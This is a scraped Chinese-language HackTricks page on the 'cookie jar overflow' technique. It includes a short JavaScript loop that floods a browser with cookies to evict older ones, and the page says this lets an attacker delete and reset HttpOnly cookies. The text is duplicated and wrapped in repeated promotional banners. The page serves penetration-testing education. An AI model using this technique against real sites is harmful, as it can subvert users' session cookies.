Cookie Jar Overflow

从零开始学习AWS黑客技术，成为专家 ！

其他支持HackTricks的方式：

如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看!
获取
探索，我们的独家
加入 💬 或或关注我们的Twitter 🐦 。
通过向和 github仓库提交PR来分享您的黑客技巧。

浏览器对页面存储的cookie数量有限制。因此，如果出于某种原因您需要使一个cookie消失，您可以溢出cookie存储罐，因为最旧的cookie将在此之前被删除：

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

注意，指向不同域的第三方cookie不会被覆盖。

这种攻击也可以用来覆盖HttpOnly cookie，因为你可以删除它，然后用你想要的值重新设置它。

在检查这一点。

从零开始学习AWS黑客技术，成为专家 ！

支持HackTricks的其他方式：

如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看!
获取
探索，我们的独家收藏品
加入 💬 或或关注我们的Twitter 🐦 。
通过向和 github仓库提交PR来分享您的黑客技巧。

上一页Cookie Tossing 下一页Cookie Bomb

最后更新于1年前

从零开始学习AWS黑客技术，成为专家 ！

其他支持HackTricks的方式：

如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看!
获取
探索，我们的独家
加入 💬 或或关注我们的Twitter 🐦 。
通过向和 github仓库提交PR来分享您的黑客技巧。

浏览器对页面存储的cookie数量有限制。因此，如果出于某种原因您需要使一个cookie消失，您可以溢出cookie存储罐，因为最旧的cookie将在此之前被删除：

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}